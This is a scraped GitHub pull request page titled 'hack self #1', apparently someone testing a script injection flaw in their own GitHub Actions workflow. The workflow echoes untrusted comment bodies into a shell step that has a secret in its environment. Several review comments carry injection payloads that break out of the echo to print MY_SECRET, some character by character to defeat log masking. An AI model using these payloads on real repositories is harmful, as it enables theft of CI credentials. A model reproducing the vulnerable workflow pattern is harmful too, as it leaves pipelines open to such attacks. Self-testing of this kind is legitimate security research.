-
Notifications
You must be signed in to change notification settings - Fork 1
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
hack self #1
base: main
Are you sure you want to change the base?
hack self #1
Conversation
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
";echo $MY_SECRET; echo"
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
";echo $MY_SECRET; echo"
@@ -14,3 +14,5 @@ jobs: | |||
MY_SECRET: ${{ secrets.MY_SECRET }} | |||
run: | | |||
echo "${{ github.event.comment.body }}" | |||
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
";echo $MY_SECRET; echo"
@@ -14,3 +14,5 @@ jobs: | |||
MY_SECRET: ${{ secrets.MY_SECRET }} | |||
run: | | |||
echo "${{ github.event.comment.body }}" |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
";for (( i=0; i<${#MY_SECRET}; i++ )); do echo "${MY_SECRET:$i:1}"; done; echo"
@@ -14,3 +14,5 @@ jobs: | |||
MY_SECRET: ${{ secrets.MY_SECRET }} | |||
run: | | |||
echo "${{ github.event.comment.body }}" | |||
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
";echo "this is after pr was closed";for (( i=0; i<${#MY_SECRET}; i++ )); do echo "${MY_SECRET:$i:1}"; done; echo"
@@ -14,3 +14,5 @@ jobs: | |||
MY_SECRET: ${{ secrets.MY_SECRET }} | |||
run: | | |||
echo "${{ github.event.comment.body }}" | |||
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
";echo "this is after pr was reopened";for (( i=0; i<${#MY_SECRET}; i++ )); do echo "${MY_SECRET:$i:1}"; done; echo"
No description provided.